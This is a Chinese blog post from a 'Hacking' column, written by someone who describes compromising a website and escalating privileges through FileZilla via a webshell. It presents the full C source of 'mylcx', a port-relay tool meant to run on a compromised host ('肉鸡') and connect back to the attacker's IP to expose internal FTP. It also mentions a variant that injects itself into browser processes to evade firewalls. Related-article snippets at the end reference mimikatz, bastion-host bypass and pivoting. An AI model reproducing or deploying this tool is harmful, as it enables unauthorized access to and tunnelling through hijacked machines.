lcx不能转发ftp解决

最新推荐文章于 2024-10-09 03:18:52 发布
最新推荐文章于 2024-10-09 03:18:52 发布
阅读量815 收藏 1
点赞数
分类专栏: Hacking 文章标签: null socket struct winapi stream 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6160325
版权

上次搞一个站的时候,用的FileZilla提权,当时挺郁闷的。用的lcx把FileZilla的端口发出来了,用户也加了,结果ftp搞死搞活愣是发不出来,想用别的工具转发一下,结果一时没搞到免杀的。当时用的是写了个bat直接在webshell上执行了,算是提权了。后来想想着下次可能会有类似的情况呢,于是写了这个东西。

我没看过lcx的源码~所以不知道为什么它不能转发ftp

下面是我自己写的一个lcx,姑且叫做mylcx吧 !


(另外我还弄了一个穿墙的lcx,嘿嘿,其实也没什么技术含量了,就是把自己插到iexplorer.exe或者其他可使用网络的文件,像flashxp.exe ,等等了~,写个lcx或者其他随便表示一下就行)



mylcx -listen 这个命令跟lcx一样
  mylcx -slave 本机端口 远程ip 远程端口
                   即把本机端口映射到远程ip的一个端口上



     在本机执行:mylcx -listen 5000 21

    在肉鸡上执行:mylcx -slave 21 你的ip 5000

  然后连接ftp 127.0.0.1 就可以登录远程的ftp了

附上源码:(嘿嘿,英文不好,变量名都是乱起,而且比较乱,见笑了)

#include <stdio.h>
#include <winsock2.h>
#include <stdlib.h>
#pragma comment(lib,"Ws2_32")

HANDLE hevent;

 

typedef struct _s1ands2
{
 SOCKET s1;
 SOCKET s2;
} s1ands2;

typedef struct _info{
 int listenorslave; //1-listen 2-slave
 unsigned short listen_port1;
 unsigned short listen_port2;
 unsigned short slave_local;
 char remoteip[16];
 unsigned short remoteport;
} info;

 

DWORD WINAPI s1tos2(LPVOID p)
{
 s1ands2* temp=(s1ands2*)p;
 char buff[2048]={0};
 int bytesdone;

 SOCKET s1,s2;
 s1=temp->s1;
 s2=temp->s2;
 while(1)
 {
  int errorcode;
  bytesdone=recv(s1,buff,2048,0);
 
  errorcode=GetLastError();
  if(bytesdone<=0)
  //if(bytesdone<=0)
  {
   SetEvent(hevent);
   return 0;
  }
  printf("%d bytes=%d/n",errorcode,bytesdone);
  bytesdone=send(s2,buff,bytesdone,0);
  errorcode=GetLastError();
  //if(errorcode>0)
  if(bytesdone<=0)
  {
   SetEvent(hevent);
   return 0;
  }

 }
 return 0;

}


/*

DWORD WINAPI s2tos1(LPVOID p)
{
 s1ands2* temp=(s1ands2*)p;
 char buff[2048]={0};
 int bytesdone;

 SOCKET s1,s2;
 s1=temp->s1;
 s2=temp->s2;
 while(1)
 {
  bytesdone=recv(s2,buff,2048,0);
  send(s1,buff,bytesdone,0);
 }

 return 0;

}


*/


int lcxlisten(unsigned short p1,unsigned short p2)
{
 SOCKET s1,s2,rs1,rs2;
 
 unsigned short port1,port2;

 int len1,len2;

 port1=p1;

 port2=p2;

 s1=socket(AF_INET,SOCK_STREAM,0);

 sockaddr_in addr1,addr2;
 sockaddr_in raddr1,raddr2;

 addr1.sin_family=AF_INET;

 addr1.sin_addr.S_un.S_addr=INADDR_ANY;

 addr1.sin_port=htons(port1);

 addr2.sin_family=AF_INET;

 addr2.sin_addr.S_un.S_addr=INADDR_ANY;

 addr2.sin_port=htons(port2);

 bind(s1,(const sockaddr *)&addr1,sizeof(addr1));

 s2=socket(AF_INET,SOCK_STREAM,0);

 bind(s2,(const sockaddr *)&addr2,sizeof(addr2));

 listen(s1,5);

 listen(s2,5);

 len1=sizeof(raddr1);

 len2=sizeof(raddr2); 

 printf("waiting on port %d.../n",port1);

 rs1=accept(s1,(struct sockaddr *)&raddr1,&len1);

 printf("%s connected/n",inet_ntoa(raddr1.sin_addr));

 printf("wating on port %d.../n",port2);

 rs2=accept(s2,(struct sockaddr *)&raddr2,&len2);

 printf("go.../n");

 s1ands2 temp1,temp2;

 temp1.s1=rs1;

 temp1.s2=rs2;

 CreateThread(NULL,NULL,s1tos2,&temp1,NULL,NULL);
 
 temp2.s1=rs2;

 temp2.s2=rs1;

 CreateThread(NULL,NULL,s1tos2,&temp2,NULL,NULL);

 hevent=CreateEvent(NULL,false,false,NULL);

 //hevent[1]=CreateEvent(NULL,false,false,NULL);

 //WaitForMultipleObjects(2,&hevent,false,INFINITE);


 WaitForSingleObject(hevent,INFINITE);
 printf("end waiting1/n");
 CloseHandle(hevent);
 closesocket(rs1);
 closesocket(rs2);
 closesocket(s1);
 closesocket(s2);


 return 0;
}

int lcxslave(unsigned short local,char* remoteip,unsigned short remoteport)
{
 WSADATA wsa;

 WSAStartup(MAKEWORD(2,2),&wsa);

 SOCKET s1,s2;

 sockaddr_in addr1,addr2;

 addr1.sin_family=AF_INET;

 addr1.sin_addr.S_un.S_addr=inet_addr(remoteip);

 addr1.sin_port=htons(remoteport);

 s1=socket(AF_INET,SOCK_STREAM,0);

 if(connect(s1,(const struct sockaddr*)&addr1,sizeof(addr1)))
 {
  closesocket(s1);
  return 0;
 }

 s2=socket(AF_INET,SOCK_STREAM,0);

 addr2.sin_family=AF_INET;

 addr2.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");

 addr2.sin_port=htons(local);

 if(connect(s2,(const struct sockaddr*)&addr2,sizeof(addr2)))
 {
  closesocket(s1);
  closesocket(s2);
  return 0;
 }

 s1ands2 temp,temp2;

 temp.s1=s1;

 temp.s2=s2;

 CreateThread(NULL,NULL,s1tos2,&temp,NULL,NULL);

 temp2.s1=s2;

 temp2.s2=s1;

 CreateThread(NULL,NULL,s1tos2,&temp2,NULL,NULL);

 hevent=CreateEvent(NULL,false,false,NULL);

 //hevent[1]=CreateEvent(NULL,false,false,NULL);

 //WaitForMultipleObjects(2,&hevent,false,INFINITE);


 WaitForSingleObject(hevent,INFINITE);
 
 printf("end waiting2/n");

 CloseHandle(hevent);
 closesocket(s1);
 closesocket(s2);

 return 0;
}

int main(int argc, char* argv[])
{
 WSADATA wsa;
 WSAStartup(MAKEWORD(2,2),&wsa);
 if(argc<2)
 {
  printf("usage:mylcx.exe -listen port1 port2/n"
   "mylcx.exe -slave localport remoteip remoteport/n");
  return 0;
 }
 if(strcmp(argv[1],"-listen")==0)
 {
  while(1){
   lcxlisten(atoi(argv[2]),atoi(argv[3]));
   Sleep(1000);
  }
  return 0;
 }


 if(strcmp(argv[1],"-slave")==0)
 {
  while(1)
  {
   lcxslave(atoi(argv[2]),argv[3],atoi(argv[4]));
   Sleep(1000);
  }
  return 0;

 }
 //lcxlisten(5000,21);
 //lcxslave(800,"127.0.0.1",5000);
 return 0;
}

 

 

 

 

 

                                                                                                                                                     [本文转载]

7禧
关注
专栏目录
lcx-实用技术
abu1216的博客
01-06 819
1.文件上传和下载如何实现? 文件上传 文件上传的本质是IO流的从操作;客户端: 1.必须使用post,post才能携带大数据 2.必须设置type=“file” name="file"必须要有名字 3.必须要设置enctype="multipart/form-data"服务器端:通过request.getInputStream()获取字节输入流,读取请求正文内容;将上传内容得到,保存在服务器端,就完成了文件上传;实际使用直接用框架中的api就可以,commons-fileupload是apach
ftp 跳板机 连接服务器_如何绕过堡垒机远程登录
weixin_36310376的博客
12-23 1493
以下文章来源于Bypass ,作者Bypass来自公众号:Bypass假设一个场景:在Webshell中执行mimikatz获取到win管理员密码,并且本地查看端口3389是开放的,可是从当前跳板机无法远程到目标机器。因为某个特定需求,一定要远程登录到这台win服务器,这时该怎么办?首先我们先分析一下这个场景,端口开放却无法连接,最有可能的情况,就是到达目标网段受到ACL策略限制,只允许通过特定网...
mylcx 穿墙版
cnbird's blog
09-08 1927
作者:gaohui mylcx -listen 这个命令跟lcx一样 mylcx -slave 本机端口 远程ip 远程端口 即把本机端口映射到远程ip的一个端口上    在本机执行:mylcx -listen 5000 21    在肉鸡上执行:mylcx -sl
lcx端口转发
08-24
命令行下的端口转发工具。<br>用法:lcx -tran port1 ip port2,将本地port1端口转发到IP的port2端口上。
lcx源码分析
ShadowAssassin的专栏
02-10 3549
闲着没事,看到网上找了份lcx的源码看了下。在此简单的分析下。   首先指明下 lcx 核心代码用的网络模型是select选择模型。   这里仅分析了常用的功能代码   -listen port1 port2 -slave ip port1 127.0.0.1 3389   经过分析 ,画出程序大致流程如下。   (图中的buf是共用一片缓冲区,每个机器有两个共用的bu
端口转发工具lcx的使用总结(lcx下载)
老野的成长之路
11-05 7019
原文地址:端口转发工具lcx的使用总结(lcx下载)作者:醉清风xf 端口转发工具lcx的使用总结 以远程桌面使用为例 一、跳板机方式      即:内网主机A只能通过具备外网访问权限的主机B进行访问,要使得外网主机C能够远程桌面到内网主机A     1、在跳板主机B上执行如下指令         lcx -listen 51 3389     //该句话的作用意味着在主机B
Lcx的多种用法:3个功能+9个参数
stonesharp的专栏
02-24 6106
前言 记得刚开始接触黑客技术的时候是2014年,那时候struts2漏洞利用工具正流行,当时也下载了一个玩玩,上传了很多的菜刀木马,不过这时候就有个问题:无法连接到被控制计算机的3389。百度一下,原来对面的服务器是在内网中,没有做映射是连接不到的,但是可以借助一个工具进行端口转发来实现连接处于内网的3389服务器,原文链接(百度搜索lcx第一条出现的):http://sec.chinaby
探索 LCX—— 强大的远程连接工具
m0_57836225的博客
10-09 428
总之,LCX 是一款非常实用的远程连接和内网穿透工具,通过合理的使用和配置,我们可以在不同的网络环境中实现高效的远程访问和数据传输。但在使用过程中,一定要注意安全性、合法性和稳定性问题,确保我们的网络行为是安全、合法和可靠的。LCX(Port Forwarding Tool),即端口转发工具,它能够在各种网络环境中实现远程连接和内网穿透,让我们可以轻松访问那些处于不同网络位置的设备和服务。首先,明确自己的远程连接和内网穿透需求,确定需要访问的内网设备的 IP 地址和端口号,以及公网服务器的相关信息。
笔记,后期整理
weixin_30278237的博客
08-06 8388
VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit1bit 是一个字节 一个字节就是8位由0或者1组成(二进制) 10 进制0-9组成的数字...
世界观安全
hacckjacking
08-06 674
「第二篇」客户端脚本安全 批注 [……] 表示他人、自己、网络批注 参考资料来源于 * 书中批注 * CSDN * GitHub * Google * 维基百科 * YouTube * MDN Web Docs ...
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 952
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
Web安全深度剖析-笔记
qq_30378851的博客
11-20 3443
Web安全深度剖析-笔记 文章目录Web安全深度剖析-笔记HTTP基础知识http请求方法http状态码http消息头(字段)截取HTTP请求搜索引擎劫持SQLmap注入注入基础知识使用DVWA来练习使用sqlmapSQLmap基本使用方法更多的选项简述利用过程其他常用的参数用法SQLmap能检测到的注入类型其他检测SQL注入的工具上传漏洞WEB解析漏洞简介IIS6.0解析漏洞APACHE漏洞PH...
内网安全-隧道技术-防火墙限制协议绕过-文件传输
weixin_45701675的博客
04-18 4199
隧道技术: 一种通过使用互联网络基础设施在网络之间传递数据的方式,包括数据封装、 传输和解包在内的全过程。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。 封装: 隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。 新的包头提供了路由信息,从而使封装的负载数据能够通过互联网络传递 传输: 被封装的数据包在隧道的两个端点之间通过公共互联网络进行路由。 被封装的数据包在公共互联网络上传递时所经过的逻辑路径称为隧道 解包: 一旦到达网络终点,数据将被解包并转发到最终目的地
【内网学习笔记】7、lcx、netcat和socat的使用
TeamsSix 的 CSDN 空间
05-28 779
1、lcx 使用 lcx 分为 Windows 版和 Linux 版,Linux 版叫 portmap Windows 内网端口转发 内网失陷主机 lcx.exe -slave rhost rport lhost lport 公网代理主机 lcx.exe -listen lport1 lport2 内网失陷主机 lcx.exe -slave 123.123.123.123 4444 127.0.0.1 3389 公网代理主机 lcx.exe -listen 4444 5555 在建立连接后,访问
【个人博客】 Java、技术面试必备基础知识、Leetcode、计算机操作系统、计算机网络等_CSLearning.zip
最新发布
10-31
【个人博客】 Java、技术面试必备基础知识、Leetcode、计算机操作系统、计算机网络等_CSLearning
yolo算法-车辆行人数据集-1433张图像带标签-汽车摩托车人test-c86ef.zip
10-31
yolo系列算法目标检测数据集,包含标签,可以直接训练模型和验证测试,数据集已经划分好,适用yolov5,yolov8,yolov9,yolov7,yolov10,yolo11算法; 包含两种标签格:yolo格式(txt文件)和voc格式(xml文件),分别保存在两个文件夹中; yolo格式:<class> <x_center> <y_center> <width> <height>, 其中: <class> 是目标的类别索引(从0开始)。 <x_center> 和 <y_center> 是目标框中心点的x和y坐标,这些坐标是相对于图像宽度和高度的比例值,范围在0到1之间。 <width> 和 <height> 是目标框的宽度和高度,也是相对于图像宽度和高度的比例值
江苏大学京江学院在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
内网端口转发实战:LCX教程
"LCX使用教程介绍了如何利用此工具进行内网端口转发解决外网访问内网特定服务的问题。在实际网络环境中,由于防火墙和安全策略,直接从外网访问内网服务通常受到限制。Lcx.exe作为一个端口转发工具,通过在被控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值